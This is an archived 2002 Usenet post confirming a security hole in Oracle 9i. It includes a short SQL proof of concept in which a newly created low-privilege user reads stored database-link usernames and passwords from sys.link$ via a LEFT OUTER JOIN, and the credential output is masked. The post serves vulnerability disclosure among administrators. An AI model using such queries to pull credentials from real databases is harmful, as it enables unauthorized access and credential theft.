Oracle FAQ | Your Portal to the Oracle Knowledge Grid |
Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?
Ouch - 9.0.1.3 on HP-UX
connect / as sysdba
CREATE USER us1 IDENTIFIED BY us11;
Grant Create Session To us1;
connect us1/us11
select a.userid, a.password
from sys.link$ a left outer join sys.link$ b on
b.name= a.name
;
userid password
--------- --------------
XXX **********
-- Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html Vladimir M. Zakharychev wrote in message ...Received on Mon Apr 15 2002 - 17:32:58 CDT
>Anyone with 9i can confirm this?
>
>
>
>This effectively means that LEFT OUTER JOIN allows to create views
>on tables that are normally not visible (provided that unprivileged user
>knows table and column names).